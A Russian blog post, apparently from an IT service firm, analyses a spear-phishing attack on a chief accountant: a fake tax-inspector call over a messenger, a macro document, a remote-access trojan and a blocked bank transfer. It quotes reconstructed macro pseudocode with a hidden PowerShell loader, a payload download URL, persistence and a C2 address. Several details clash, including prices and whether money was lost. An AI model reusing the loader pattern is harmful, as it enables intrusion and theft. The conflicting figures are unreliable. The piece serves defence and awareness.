Главбуха развели в MAX: хронология атаки и наши процедуры после

Представляете, к нам в ITFresh как-то обратился директор одной торговой компании? Он работает в районе Очаково, в его штате 32 РМ, и занимается он оптовой продажей автозапчастей. Годовой оборот у них, надо сказать, весьма приличный — около 180 миллионов рублей. Во вторник, ровно в 17:42, раздался звонок. Директор сразу выпалил: «Моя главбух три часа болтала с ФНС в MAX, потом открыла какой-то файл, а теперь, похоже, пытается перевести 280 тысяч рублей – мне банк только что звонил!» Жуть, правда? В этом материале я подробно, буквально по минутам, разберу, что же произошло в тот день, с 14:18 до 17:42. Мы посмотрим, какие шаги главбух сделала правильно – и таких, поверьте, было немало! – а также какие шесть ключевых процедур наша команда ITFresh затем внедрила в компании, чтобы подобный кошмар больше никогда не повторился.

Что предшествовало звонку

За пару недель до этих жутких событий, компания получила самое обычное требование от ФНС. Оно касалось документов по одному из их контрагентов. В общем, стандартная встречная проверка, ничего необычного. Главбух, конечно, действовала строго по правилам: собрала весь нужный пакет, загрузила его в «Контур-Экстерн» и отправила в инспекцию. Это было совершенно легальное общение с налоговой. Никаких подозрений, понятное дело, оно вызвать не могло.

Похоже, атакующие точно знали об этой проверке. Трудно сказать, имели ли они прямой доступ к самому требованию, но одно очевидно: они знали, что компания только что общалась с ФНС. Поэтому вся история со «сверкой» звучала невероятно правдоподобно. А вот откуда произошла такая утечка — это, к сожалению, остаётся загадкой. На нашей практике подобные сведения часто утекают через болтливого бухгалтера контрагента в каком-нибудь дружеском чате, или даже через недобросовестного сотрудника инспекции. Иногда такие данные просто находят в открытых источниках, где публикуются судебные и налоговые процессы юридических лиц. В этом конкретном случае, источник утечки установить так и не удалось.

И вот что поражает: это была не просто какая-то «массовая рассылка». Это была целенаправленная, я бы сказал, точечная атака. Злоумышленники позвонили *именно* главбуху. *Именно* в эту компанию. И для связи выбрали *именно* MAX, а не привычные ей WhatsApp или Telegram. Более того, звонок пришёлся на обеденное время вторника. В этот момент коллеги обычно уходят на перерыв, и главбух осталась в кабинете одна. Это уже не тот старый добрый фишинг, где просто кидают удочку и надеются, что кто-нибудь клюнет. Это был настоящий спир-фишинг.

14:18 — первый звонок

Звонок главбуху пришёл в MAX с номера, который отображался как «+7 495 ХХХ-ХХ-ХХ (Москва)». Знаете, в MAX, в отличие, например, от WhatsApp, звонок не привязан к списку контактов – можно запросто позвонить и тому, кого у тебя нет в записной книжке. Звонившая представилась «старшим инспектором Орловой из отдела камеральных проверок ИФНС 27». Голос? Женский, средних лет, удивительно спокойный и, я бы добавил, очень профессиональный. В первые минуты разговора никакого намёка на давление или стресс, наоборот, тон был исключительно корректным.

«Орлова» очень вежливо поинтересовалась, как прошёл документооборот по недавней встречной проверке компании. А потом, как бы между прочим, добавила, что в их системе, мол, обнаружилось расхождение по одной из строк сверки. И, дескать, нужно дополнительно подтвердить контрольные суммы. Главбух, конечно, сильно удивилась: никаких расхождений в её документах просто быть не могло, она же их сама готовила! На это «Орлова» абсолютно спокойно отреагировала: «Да это обычное дело, дочка. У нас регулярно, после переезда на новую базу, такие косяки вылезают. Я вам сейчас быстро скину файл сверки, гляньте конкретно по строке 14, там у нас разница в 12 314 рублей».

Именно здесь главбух сделала свой первый по-настоящему правильный шаг: она засомневалась. И прямо спросила: «А почему вы звоните через мессенджер? Обычно же вы требования присылаете через Контур». «Орлова» тут же нашлась с ответом, даже не замешкалась: «Дочка, я понимаю, что это необычно. Но у меня стоит задача сдать выгрузку до конца дня. А в Контуре сейчас, как назло, технические работы. Ну что ж, можем по-быстрому через MAX, а потом я, конечно, пришлю вам официальный ответ. Иначе, знаете ли, придётся всё делать в установленный 5-дневный срок, а это уже, сами понимаете, скандал и штраф».

Вот он, тот самый переломный момент. Приём со «срочностью» сработал идеально. Главбух, к сожалению, согласилась посмотреть файл.

Чем главбух могла остановить атаку прямо здесь

Что нужно было сделать? Просто положить трубку. И сразу перезвонить в свою инспекцию по официальному номеру, который есть на сайте nalog.gov.ru. Это займёт всего 5-7 минут, согласитесь. Настоящая инспекторша тут же объяснила бы, что никаких звонков в MAX от их имени просто не бывает. И на этом мошенническая атака тут же бы прекратилась.

Была и вторая опция: позвонить мне или напрямую директору. Просто спросить: «Не подозрительно ли это?». Я потом сказал главбуху: «Я никогда, ни при каких обстоятельствах, не упрекаю клиента за лишний звонок 'вдруг'». Поверьте, лучше сто пустых звонков, чем один пропущенный инцидент, который обернется реальными потерями.

14:52 — приём файла

«Орлова» прислала файл с именем Сверка_расчётов_2026_ООО_ХХХ.docm. Сам факт расширения .docm (а не .docx) — это макрос-документ Word. В современных версиях Office такие файлы по умолчанию открываются с отключёнными макросами и красной плашкой сверху «Включить редактирование», потом ещё одной «Включить макросы». Это две защитные кнопки, и обычно они достаточны.

Файл, кстати, был совсем небольшой, всего 184 КБ. Он открылся в Word 2021, который стоял у клиента как часть лицензионного Office 365. А внутри — пустая таблица из 15 строк. Над ней, конечно, надпись: «Содержимое отображается некорректно. Включите макросы для просмотра данных сверки». «Орлова» же тем временем параллельно диктовала ей в MAX следующие шаги: «Сейчас сверху выскочит такая плашка, нажмите там “Включить редактирование”, а потом “Включить макросы” – без этого таблица просто не покажется».

И главбух нажала. Обе кнопки, представляете? Word, естественно, тут же выдал предупреждение: «Этот документ содержит макросы. Включение макросов из неизвестного источника опасно». Она это предупреждение, конечно, прочитала, но, увы, проигнорировала. Ведь «инспекторша» в тот же миг уже успокаивала её: «Да это же стандартное предупреждение Microsoft, у нас все документы такие, ничего страшного!»

Что было в макросе

Через 6 часов после инцидента я разобрал файл в изолированной VM. Внутри — Visual Basic for Applications-скрипт на 380 строк, обфусцированный (имена переменных типа aQwzXvKi). Распакованный, он делал следующее.

' Реконструированный псевдокод макроса
Sub AutoOpen()
    ' 1. Скачивание payload через PowerShell
    Dim cmd As String
    cmd = "powershell -nop -w hidden -enc " & _
          "JABjAGwAaQBlAG4AdAAgAD0AIABO..." ' base64 длиной 1200 символов
    Shell cmd, vbHide

    ' 2. Сохранение и запуск второй стадии
    ' payload скачивает RAT-агент по адресу
    ' https://docs-fns-checks[.]ru/static/2026_check.bin
    ' и кладёт в %APPDATA%\Microsoft\Office\office365update.exe

    ' 3. Регистрация в автозапуск через scheduled task
    ' schtasks /create /tn "OfficeUpdate" /tr "..." /sc onlogon /rl highest

    ' 4. Установка обратной связи с C2 через WebSocket
    ' wss://docs-fns-checks[.]ru:443/ws
End Sub

Это типичный загрузчик первой стадии. Он сам по себе ничего страшного не делает — только скачивает «настоящего» RAT-агента (Remote Access Trojan). RAT-агент — кастомный билд на основе SilentEye или клона NjRAT, который умеет: захват экрана раз в 5 секунд, перехват клавиатуры, чтение буфера обмена, доступ к файловой системе, удалённый запуск команд от имени пользователя. И главное — снимок окна банк-клиента в момент, когда пользователь видит SMS-код.

15:08-15:40 — захват сессии 1С и банк-клиента

Как только макрос запустился, RAT-агент тут же, абсолютно незаметно, установился в фоновом режиме. На компьютере главбуха, к сожалению, не было антивируса с поведенческим анализом. Даже стандартный Defender Windows 11 23H2 на тот момент эту малварь пропустил. Мы потом специально проверили хеш в VirusTotal: оказалось, что до 14:52 во вторник ни один из 67 движков её не распознавал. И только спустя 18 часов, после того как мы обратились в Microsoft и к паре других вендоров, хеш наконец-то появился в списках Defender.

Не теряя ни секунды, атакующий начал действовать через установленный RAT. Он сразу же сделал ряд ключевых шагов.

• Первым делом мошенник сделал скриншот экрана. На нем видно: главбух, конечно, работала в 1С 8.3.24 — окно программы было свернуто в трей, чтобы не мешать. Но рядом, на виду, красовалась открытая вкладка с окном входа в банк-клиент ВТБ. Это была прямая наводка.
• Следующий шаг — запуск клавиатурного логгера. Какое совпадение! Главбух как раз вводила коды и пароли в банк-клиент, подписывая совершенно другую, совершенно легитимную платёжку. Вся информация — как на ладони.
• Потом злоумышленник получил доступ к буферу обмена. И что там? В нем сохранился ОКПО нужного контрагента, который главбух копировала буквально пять минут назад. Идеальная находка!
• Через 30 минут — выгрузил список последних 50 платёжек из 1С через работу с базой данных напрямую. Доступа к OLE-API 1С не требовалось — RAT просто читал сохранённые таблицы из C:\1Cv8\base\.

Тем временем в MAX «Орлова» продолжала свою болтовню, не давая главбуху задуматься: «Видите, файл загрузился. Я сейчас со своей стороны сделаю экспорт по строке 14 и пришлю вам сверку, минут через 10-15. Только, пожалуйста, не закрывайте Word, у нас тут сейчас процесс выгрузки идёт». Это такой типичный приём, знаете ли. Занять жертву разговором, отвлечь её внимание от того, как меняется поведение компьютера. И действительно, RAT-агент при первой инициализации даёт небольшую задержку курсора. Главбух это заметила – она сама мне потом об этом рассказала. Но, к сожалению, списала на «обычные тормоза» компьютера.

16:22 — попытка перевода 280 000 рублей

Прошло всего 1 час 14 минут после того, как макрос обосновался в системе. И что дальше? Атакующий сразу переключился на самое главное — деньги. Он провернул хитрую штуку: использовал RAT, чтобы захватить активную сессию главбуха в банк-клиенте ВТБ. Повезло ему? Ещё бы! Главбух как раз была там по своим делам, так что сессия была тёпленькая, готовая. Оставалось лишь создать платёжку.

• Получателем средств, конечно же, оказалось ООО «Стройинвест-Сервис». Вся картина сразу стала ясна: это была типичная фирма-однодневка, зарегистрированная всего за месяц до нашего инцидента. Чистой воды «пустышка».
• Сумма: 280 000 рублей.
• И наконец, назначение платежа: «Оплата по договору № 14/02 от 12.04.2026 за услуги маркетинга, в т.ч. НДС 46 666,67». Всё выглядело абсолютно рутинно, как обычная бухгалтерская проводка.
• ИНН получателя: 5024XXXXXXX (Красногорск, ИП который через месяц был ликвидирован).

Платёжка отправилась на подпись. Это был момент истины. Главбух, как обычно, ждала SMS-код на свой рабочий телефон. Код пришёл. А в этот самый момент RAT-агент не терял времени: он мгновенно сделал скриншот экрана! На нём прекрасно был виден тот самый SMS-код. Почему? Да потому что главбух держала телефон прямо у монитора – увы, это частая история в бухгалтериях. Атакующий сработал молниеносно: ввёл код в банк-клиент, и вуаля – платёж получил статус «отправлено».

Как банк удержал перевод

Ровно в 17:12, спустя 50 минут после того, как платёж ушёл, сработал анти-фрод ВТБ. Вот что спасло нас! У этой компании, поверьте, своя, привычная схема работы с банком: ежедневно гуляют суммы от 800 тысяч до 2 миллионов рублей, всегда одни и те же проверенные контрагенты. И что же мы видим тут? Внезапная платёжка на 280 000 рублей — и кому? Какому-то ИП из Красногорска, которого в истории компании отродясь не было! Конечно, такую операцию система банка моментально отправила в HOLD-список. От руководителя потребовалось повторное подтверждение.

Буквально через шесть минут, в 17:18, директору компании позвонил сотрудник ВТБ. Стандартный вопрос: «Подтверждаете платёж номер NNNN от такого-то времени?» Директор, разумеется, понятия не имел, о чём речь, и сразу дал отбой. Отказ! Платёжка тут же улетела в reject. Слава богу, деньги остались целы. А наш директор прямиком отправился в кабинет главбуха. И вот тут-то всё и прояснилось: главбух всё ещё висела на трубке. Она продолжала беседовать с «Орловой», которая к тому моменту уже успела перейти к «успокаивающим» фразам вроде: «Коллега, не пугайтесь, я уверена, что у вас сейчас на счёте подвисла операция. Мы обязательно с ней разберёмся вместе».

Директор мгновенно смекнул, что тут явно что-то нечисто. Он без лишних слов выдернул сетевой кабель из компьютера главбуха. А ровно в 17:42 набрал мой номер. Позвольте, это, на мой взгляд, спасло фирму не только от безвозвратной потери тех самых 280 000 рублей, но и прервало саму атаку. Атакующий, используя RAT-агент, уже готовил ещё два платежа! На подставные ИП, на 145 и 198 тысяч рублей. Но, к счастью, и эти транзакции угодили в сети анти-фрода.

Что мы сделали с 17:42 до утра среды

В 18:10 я был в офисе клиента в Очаково. Первое — изоляция компьютера главбуха. Сетевой кабель уже был выдернут. Компьютер не выключали (это бы стёрло волатильные данные из RAM, которые мне нужны были для расследования). Снял дамп памяти через Magnet RAM Capture, дамп пользовательского профиля, ветку реестра, журналы Windows Event Log.

# Снимаем дамп памяти живого компьютера (Windows 11)
.\MagnetRAMCapture.exe /accepteula /go /output:E:\incident-2026-04-27\ram.raw

# Список процессов на момент захвата
tasklist /v /fo csv > E:\incident-2026-04-27\processes.csv

# Активные TCP-соединения с PID
netstat -ano > E:\incident-2026-04-27\netstat.txt

# Журналы Windows за последние 24 часа
wevtutil epl Security E:\incident-2026-04-27\Security.evtx /q:"*[System[TimeCreated[timediff(@SystemTime) <= 86400000]]]"
wevtutil epl Application E:\incident-2026-04-27\Application.evtx
wevtutil epl System E:\incident-2026-04-27\System.evtx
wevtutil epl "Microsoft-Windows-PowerShell/Operational" E:\incident-2026-04-27\PS.evtx

# Скрытые сервисы и scheduled tasks
sc query type= service state= all > E:\incident-2026-04-27\services.txt
schtasks /query /fo csv /v > E:\incident-2026-04-27\schtasks.csv

# Регистр автозапуска
reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" E:\incident-2026-04-27\run-hklm.reg
reg export "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" E:\incident-2026-04-27\run-hkcu.reg

В дампе памяти и в schtasks-журнале нашёл задачу «OfficeUpdate», которая каждый logon перезапускала office365update.exe из %APPDATA%\Microsoft\Office\. Это и был RAT-агент. Извлёк бинарь, прогнал через jadx и Ghidra, выудил адрес C2 — docs-fns-checks[.]ru на IP 185.XX.XX.XX (хостер в Молдове).

Что я сделал? Сразу же! Я отправил этот вредоносный IP-адрес в наш AdGuard-резолвер, а также добавил его в блокирующий список офисного MikroTik. Теперь что бы ни случилось, даже если этот же RAT каким-то чудом пролезет на другой ПК в нашей компании, он просто физически не сможет связаться со своим C2-сервером. Кроме того, я тут же предупредил Kaspersky и Доктора Веба о новом индикаторе компрометации (IoC). ETag-хеш агента попал в их базы меньше чем за 6 часов – это очень быстро.

Мы восстановили компьютер главбуха буквально с нуля, под ключ. Что это значит? Поставили новенький SSD, сделали абсолютно чистую установку Windows 11 24H2, развернув систему с нашего золотого образа клиента. А 1С версии 8.3.24 переустанавливали исключительно из официального дистрибутива! Ни в коем случае не из бэкапа – мало ли, вдруг там уже сидели заражённые исполняемые файлы? После этого, конечно, переподключили к серверу 1С, но уже с новыми, чистыми учётными данными. Старый SSD я бережно упаковал в непрозрачный конверт и убрал в сейф клиента. Он нам ещё ох как пригодился: и для дальнейшего расследования, и в качестве доказательства для полиции.

Шесть процедур, которые мы внедрили после

Спустя неделю после этого кошмара, мы — я, директор и главбух — наконец-то собрались. Сели, вздохнули и хорошенько прошлись по всем, абсолютно всем процедурам, связанным с нашими финансами. Результат? Шесть совершенно новых, чётких правил, которые теперь официально прописаны и закреплены в нашем внутреннем регламенте. Теперь всё по-другому!

Процедура 1: отдельный компьютер для банк-клиента

Мы взяли мини-ПК Beelink Mini S12, он обошёлся нам в 15 000 ₽, вместе с лицензией Windows 11 Pro. Знаете, что на нём стоит? Ровным счётом НИЧЕГО, кроме банк-клиентов ВТБ и СберБизнес. Ни браузеров, ни Офиса, ни мессенджеров – вообще ничего лишнего, просто стерильно! Для него выделили отдельную VLAN, и доступ с этого ПК есть только к двум конкретным IP-адресам банков. Кто им пользуется? Исключительно главбух. Для чего? Только чтобы подписать платёжки. Как только она всё подтвердила, сразу же блокирует его и переходит обратно на свой привычный рабочий компьютер.

Процедура 2: USB-токен с физическим контролем

С SMS-авторизацией мы попрощались. Вместо неё теперь у нас двухфакторная подпись через USB-токен. Это «Рутокен ЭП 3.0», кстати, каждый такой стоит 6 000 ₽, плюс ещё лицензия КриптоПро CSP 5.0 на пару лет. Главбух теперь хранит его в сейфе. Вставляется он в USB-порт строго тогда, когда нужно подписать платёжку. А после — тут же вынимается и прячется обратно. Почему это так критично? Да потому что атакующий, даже если он вдруг получит удалённый доступ к компьютеру, без этого физического токена в порту просто ничего не сможет подписать.

Процедура 3: двух-факторное подтверждение любой платёжки выше 50 000 ₽

Согласно нашему свежему регламенту, любой платёж, сумма которого превышает 50 000 ₽, теперь обязательно должен быть подтверждён директором. Причём по двум совершенно разным каналам! Это голосовой звонок на корпоративный мобильный телефон и сообщение в Element X — наш Matrix-сервер. Важно понимать: это не просто «согласование», это финальное, твёрдое «да» перед тем, как главбух вообще нажмёт кнопку. Если вдруг один из этих каналов недоступен? Всё, платёж автоматически переносится на следующий рабочий день. У нашего клиента, к слову, таких платежей в среднем 5–8 в день, и каждый из них отнимает примерно полторы минуты. Думаю, это вполне приемлемая нагрузка.

Процедура 4: выделенный «финансовый» мобильник без мессенджеров

Главбух теперь пользуется отдельным телефоном — мы выдали ей Nokia 110 4G, всего за 3 800 ₽. Это такой старый добрый кнопочник, кстати, с двумя SIM-картами. На нём стоит исключительно корпоративная SIM-карта, на которую приходят все важные SMS от банков и, конечно, от ФНС. А вот на её основном смартфоне вы больше не найдёте ни банк-клиентов, ни приложения MAX. Свой личный смартфон, где WhatsApp и Telegram, она использует только для общения с семьёй и коллегами. Всё! Ни в коем случае никаких финансовых операций с него.

Процедура 5: правило «5 минут паузы» при любом срочном звонке

Если главбуху звонит кто-то и требует срочных, немедленных действий – например, «прямо сейчас!» – у неё теперь чёткая инструкция. Что она делает? Сначала кладёт трубку. Потом ставит пятиминутный таймер. В течение этих пяти минут она обязана перезвонить либо мне, либо директору. И только после нашего одобрения можно связываться с тем, кто звонил первым. Мы даже специально распечатали это правило на заметной плашке и повесили прямо на стену в её кабинете! По нашему опыту, 9 из 10 атак с использованием социальной инженерии отсекаются именно за счёт этого простого правила: «Не действовать сразу!»

Процедура 6: phishing-симуляции раз в две недели

Мы запустили GoPhish-кампанию. Теперь каждые две недели шесть сотрудников бухгалтерии и финансовой службы получают тренировочные фишинг-письма. Это может быть что угодно: то «срочное требование от ФНС», то «очень важное приглашение на вебинар», то «немедленно обновите ваш мессенджер». Тех, кто, к сожалению, всё-таки клюёт на такие уловки и кликает, мы потом сажаем на 15-минутный разбор полётов. И знаете, какой результат? Спустя всего четыре месяца после старта программы количество кликов на стандартные сценарии упало с 4 из 6 до нуля! Это просто феноменально.

Что мы передали в полицию

Мы не стали откладывать и подали заявление в УВД по ЦАО Москвы, прямо по месту регистрации нашей компании. Передали им всё, что только у нас было. Что именно? Это и дамп оперативной памяти, и полный образ заражённого SSD, и, конечно, дамп того самого .docm-файла. Мы даже сделали скриншоты с временными метками для всей переписки из MAX. А ещё приложили реквизиты подставного ИП «Стройинвест-Сервис», IP-адрес C2-сервера и, разумеется, все хеши вредоносных файлов. Пусть разбираются.

Мы, конечно, сразу подали заявление, и по статье 159 УК РФ (мошенничество в крупном размере) возбудили дело. Целых четыре месяца шло расследование – это немало! Но, увы, его приостановили, ведь установить, кто именно за этим стоял, так и не удалось. Обычная история: C2-сервер нашли в Молдове, а дроп-ИП в Красногорске оказался просто подставной фирмой. Конечно, украденные деньги не вернули. Но огромный плюс — благодаря банковскому анти-фроду, средства даже не успели списаться! И вот тут самое главное: мы смогли добиться юридической значимости. Это позволило компании списать налоги с потерь — 250 000 рублей на восстановление всей IT-инфраструктуры. Эти расходы официально оформили как «потери от противоправных действий третьих лиц».

FAQ: что чаще всего спрашивают клиенты

Может ли ФНС реально позвонить через мессенджер?

Вот правило, которое нужно высечь в камне: налоговая инспекция в России НИКОГДА не звонит вам в WhatsApp, Telegram или тем более в MAX! Вообще никогда. Если вам звонят от имени ФНС в мессенджер — это на 100% мошенники, даже не сомневайтесь. Наша налоговая общается с компаниями только через официальные каналы: ваш личный кабинет на nalog.gov.ru, системы «Контур-Экстерн» или «1С-Отчётность». Ну, или пришлют старое доброе бумажное письмо. Если у ФНС действительно есть к вам вопросы, или нужно что-то серьезное, требование сначала появится в вашем личном кабинете. А уж потом, в крайнем случае, могут и пригласить на беседу — но только через секретаря инспекции, по городскому номеру, а не с помощью какого-то левого мессенджера.

Что делать главбуху, если позвонили и требуют срочно что-то подписать или принять?

Самое простое, что вы можете сделать — это положить трубку! Но сделайте это вежливо, не бросайте вызов, скажите что-то вроде: «Хорошо, я вам перезвоню через десять минут». И тут же, не откладывая, наберите официальный номер ведомства, который найдете на их сайте. Не пользуйтесь тем номером, что вам только что продиктовали! Помните важнейшее правило: срочность — это главный признак социальной инженерии. Ни одно государственное учреждение не станет работать по принципу «сделай это немедленно, иначе штраф!». У каждого требования есть четкие процедурные сроки, обычно это 5-10 рабочих дней. Если вам начинают давить на психику, мол, «нужно прямо сейчас, иначе беда» — это всегда, и мы подчеркиваем, ВСЕГДА чистой воды мошенничество. Это первое правило, которому мы в ITFresh учим абсолютно каждого сотрудника бухгалтерии.

Помогает ли двухфакторная авторизация на банк-клиенте?

Конечно, обычные SMS-коды или push-уведомления в банк-клиентах для юрлиц — это лучше, чем ничего. Но давайте будем честны: этого недостаточно. Если злоумышленник уже получил удаленный доступ к компьютеру главбуха, он спокойно перехватит и увидит этот код в реальном времени, верно? По нашей проверенной методике, по-настоящему надежная двухфакторная авторизация платежа должна состоять из двух НЕЗАВИСИМЫХ частей. Первая — это привычная авторизация прямо в банк-клиенте. А вот вторая — это физическое подтверждение, которое происходит на совершенно отдельном устройстве. Представьте: это USB-токен, например, Рутокен с электронной подписью, который главбух просто вынимает из компьютера сразу после подписания. Вот это уже действительно серьезная защита! Потому что даже если преступник каким-то чудом получит пароль и даже перехватит SMS-код, он все равно не сможет провести платеж без этого физического токена, который находится только в руках у главбуха.

Сколько стоит внедрение этих процедур и как долго?

Для компаний с 20-40 рабочими местами мы предлагаем полный пакет внедрения за 165 000 рублей. В среднем, все работы занимают от 8 до 12 рабочих дней. Что конкретно мы делаем за эти деньги? В стоимость входит: * Установка и настройка отдельного компьютера для безопасной работы с банк-клиентом (это примерно 10 000 ₽ за «железо» плюс наши часы); * Два USB-токена Рутокен ЭП 3.0 с лицензиями (еще 12 000 ₽) — никаких «чудес» с подписями; * Полноценное внедрение двухфакторного подтверждения для всех платежей; * Отдельный мобильный телефон для главбуха, абсолютно без мессенджеров (простой, но надежный Nokia 110 4G с SIM-картой за 15 000 ₽); * Масштабное обучение всей бухгалтерии, включая трехмесячные тренировочные phishing-симуляции через платформу GoPhish (стоимостью 24 000 ₽); * Разработка подробного регламента работы с финансами (15 страниц, тщательно согласованных с юристом). Просто подумайте: все эти вложения окупятся сразу же, как только мы предотвратим хотя бы один инцидент!

Можно ли поймать таких атакующих и вернуть деньги?

Вернуть деньги после такой атаки? В подавляющем большинстве случаев — нет, увы. Мошенники не дураки: они используют целые прокси-цепочки, подключают «дропов» — это такие подставные получатели платежей, а деньги, как правило, уже через полчаса-час после получения улетают на криптовалютные обменники. На нашей практике, за последние два года было четыре реальных случая социальной инженерии у наших клиентов. И что вы думаете? Только в одном из них банковский антифрод смог удержать перевод. И то, только потому, что главбух успела позвонить нам, а мы — оперативно сообщить в банк ДО подтверждения! В остальных трех случаях, к сожалению, деньги ушли безвозвратно. Да, заявление в полицию подавать нужно обязательно, это важно для налогового учёта, чтобы списать убыток. Но по факту, реальные шансы вернуть свое — это где-то 5%. Поэтому мы всегда говорим: единственный по-настоящему рабочий подход — это вообще не дать атаке случиться.

Итог

Вы только представьте: всего за 3 часа 24 минуты обычный звонок, мастерски замаскированный социальной инженерией, чуть не обернулся переводом 280 000 рублей! Нам невероятно повезло: спас банковский анти-фрод и, без тени преувеличения, мгновенная реакция директора. Мы не стали ждать. Уже через две недели мы внедрили целых шесть совершенно новых процедур, которые на 100% исключили саму возможность повторения подобной атаки. Что это значит теперь? Даже если злоумышленник снова дозвонится главбуху, даже если каким-то чудом заставит ее открыть зловредный файл — без физического USB-токена и полноценного двухфакторного подтверждения он просто не сможет увести ни копейки. Эта история для нас стала ярким уроком и лишний раз показала: технологии, конечно, важны, но они не самое главное. Главное — это тщательно продуманные процедуры и, что куда важнее, правильные привычки и бдительность каждого человека.